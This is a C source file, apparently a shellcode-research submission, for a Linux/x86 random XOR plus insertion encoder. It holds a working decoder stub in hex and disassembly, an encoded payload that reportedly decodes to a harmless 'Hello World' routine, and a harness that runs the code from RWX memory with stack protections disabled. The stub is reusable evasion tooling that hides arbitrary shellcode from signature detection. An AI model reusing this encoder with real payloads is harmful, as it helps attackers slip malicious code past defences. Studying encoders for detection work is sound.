/*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/

/****************************************************
Disassembly of section .text (standalone 54-byte build of the stub; the stub[]
array below is 56 bytes: it appends `ff e6` jmp esi after the insertion loop
and adjusts the jmp/jne/call displacements by 2 accordingly):

08048060 <_start>:
8048060: eb 2f jmp 8048091 <find_address>

08048062 <decoder>:
8048062: 5f pop edi
8048063: 57 push edi
8048064: 5e pop esi

08048065 <get_key>:
8048065: 8a 07 mov al,BYTE PTR [edi]
8048067: 6a 90 push 0xffffff90
8048069: 5b pop ebx
804806a: 3c aa cmp al,0xaa
804806c: 74 0a je 8048078 <decode_insertion>
804806e: 30 d8 xor al,bl

08048070 <decode_xor>:
8048070: 30 07 xor BYTE PTR [edi],al
8048072: 47 inc edi
8048073: 30 07 xor BYTE PTR [edi],al
8048075: 47 inc edi
8048076: eb ed jmp 8048065 <get_key>

08048078 <decode_insertion>:
8048078: 8d 3e lea edi,[esi]
804807a: 31 c0 xor eax,eax
804807c: 31 db xor ebx,ebx

0804807e <insertion_decoder>:
804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
8048081: 80 f3 90 xor bl,0x90
8048084: 75 10 jne 8048096 <encoded>
8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
804808a: 88 1f mov BYTE PTR [edi],bl
804808c: 47 inc edi
804808d: 04 02 add al,0x2
804808f: eb ed jmp 804807e <insertion_decoder>

08048091 <find_address>:
8048091: e8 cc ff ff ff call 8048062 <decoder>

08048096 <encoded>:   (encoded key/data pairs ending in the 0xaa terminator -- data, not code; objdump's instruction listing below is meaningless)
8048096: b7 cc mov bh,0xcc
8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
80480a2: 75 d4 jne 8048078 <decode_insertion>
80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
80480a9: 8d (bad)
80480aa: d5 1c aad 0x1c
80480ac: f7 56 73 not DWORD PTR [esi+0x73]
80480af: 31 ef xor edi,ebp
80480b1: cd a9 int 0xa9
80480b3: 34 12 xor al,0x12
80480b5: 4f dec edi
80480b6: 50 push eax
80480b7: 40 inc eax
80480b8: 71 d0 jno 804808a <insertion_decoder+0xc>
80480ba: 94 xchg esp,eax
80480bb: c4 (bad)
80480bc: f7 d7 not edi
80480be: 7f ee jg 80480ae <encoded+0x18>
80480c0: 62 (bad)
80480c1: c3 ret
80480c2: 48 dec eax
80480c3: 03 d3 add edx,ebx
80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
80480c8: 2c 54 sub al,0x54
80480ca: 0c 78 or al,0x78
80480cc: 05 6a 37 58 e4 add eax,0xe458376a
80480d1: 8b dc mov ebx,esp
80480d3: 04 3b add al,0x3b
80480d5: ce into
80480d6: b6 4a mov dh,0x4a
80480d8: af scas eax,DWORD PTR es:[edi]
80480d9: 53 push ebx
80480da: 59 pop ecx
80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
80480dc: b5 05 mov ch,0x5
80480de: f7 30 div DWORD PTR [eax]
80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
80480e5: 60 pusha
80480e6: e4 10 in al,0x10
80480e8: 7d cc jge 80480b6 <encoded+0x20>
80480ea: 56 push esi
80480eb: cc int3
80480ec: aa stos BYTE PTR es:[edi],al
****************************************************/

#define _GNU_SOURCE /* MAP_ANONYMOUS in <sys/mman.h> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

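/*
 * Decoder stub, 56 bytes (the title's 54-byte figure is the standalone build
 * in the disassembly above, without the trailing jmp esi).
 *
 * Mechanics, as read from the disassembly:
 *   jmp / call / pop   edi = esi = address of the first byte after the stub
 *   XOR pass           for each pair (k', d) until the 0xaa terminator:
 *                        k = k' ^ 0x90 ; [even] = k' ^ k = 0x90 ; [odd] = d ^ k
 *   insertion pass     copies the byte after every 0x90 marker down to esi,
 *                      compacting the payload in place; stops at the first
 *                      even-offset byte that is not 0x90 (the 0xaa)
 *   jne 0x12           lands on the decoded payload at stub+56 (== esi)
 *
 * Consequences for the harness: the payload MUST sit directly after the stub
 * in memory, and that memory must be writable as well as executable, because
 * decoding happens in place.  The `ff e6` (jmp esi) at stub+49 is not reached
 * by any path visible here; the jne already targets esi.
 *
 * Constraints this stub imposes on the encoder: no encoded key byte k' may be
 * 0xaa (it would be taken as the terminator), and the insertion index lives in
 * `al` (add al,2), so the encoded region must stay below 256 bytes.
 *
 * The blob was restored from "xNN" text to real \xNN escapes; as plain text it
 * would be ASCII, not machine code.
 */
unsigned char stub[] =
"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8"
"\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c"
"\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb"
"\xed\xff\xe6\xe8\xca\xff\xff\xff";

/*
 * Encoded payload: 43 (key, data) pairs plus the 0xaa terminator = 87 bytes.
 * Decoding the pairs by hand with the rule above yields a 43-byte
 *   write(1, "Hello World!\n", 13); exit(0)
 * Linux/x86 shellcode (jmp/call/pop to pick up the string).  None of the
 * encoded key bytes is 0xaa, so the XOR pass runs to the real terminator.
 */
unsigned char shellcode[] =
"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7"
"\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f"
"\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e"
"\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce"
"\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60"
"\xe4\x10\x7d\xcc\x56\xcc\xaa";

/* Buffer holding stub followed immediately by shellcode; set up by main(). */
unsigned char *code;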

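/*
 * Harness: place the decoder stub and the encoded payload back to back in a
 * buffer that is readable, writable AND executable, then jump to it.
 *
 * Why mmap(RWX) instead of malloc(): the stub decodes the payload in place
 * (it writes through edi), so the pages must be writable, and it is then
 * executed, so they must be executable.  malloc() gives no executability
 * guarantee; relying on -z execstack to make the heap executable depends on
 * the kernel version.  W^X policies (SELinux execmem, hardened kernels) may
 * still refuse the mapping; then mmap fails and we report it instead of
 * crashing at the indirect call.
 *
 * Lengths come from sizeof-1 rather than strlen(): a 0x00 byte inside a blob
 * would silently truncate strlen() (neither blob here contains one).
 *
 * This executes arbitrary machine code in the current process -- run it only
 * in an isolated lab VM.
 *
 * Returns 1 if the RWX mapping cannot be created; on success control passes
 * to the payload and normally does not return here.
 */
int main(void)
{
    const size_t stub_len = sizeof stub - 1;
    const size_t payload_len = sizeof shellcode - 1;
    const size_t total = stub_len + payload_len;

    printf("Stub Length: %zu\n", stub_len);
    printf("Shellcode Length: %zu\n", payload_len);
    printf("Total Length: %zu\n", total);

    code = mmap(NULL, total, PROT_READ | PROT_WRITE | PROT_EXEC,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (code == MAP_FAILED) {
        perror("mmap(RWX)");
        return 1;
    }

    /* The payload must directly follow the stub: the stub's call/pop derives
     * the payload address as "the byte after the stub". */
    memcpy(code, stub, stub_len);
    memcpy(code + stub_len, shellcode, payload_len);

    /* Object-to-function pointer conversion is not portable ISO C, but it is
     * the usual shellcode-harness idiom on Linux/x86. */
    void (*entry)(void) = (void (*)(void))code;
    entry();

    return 0;
}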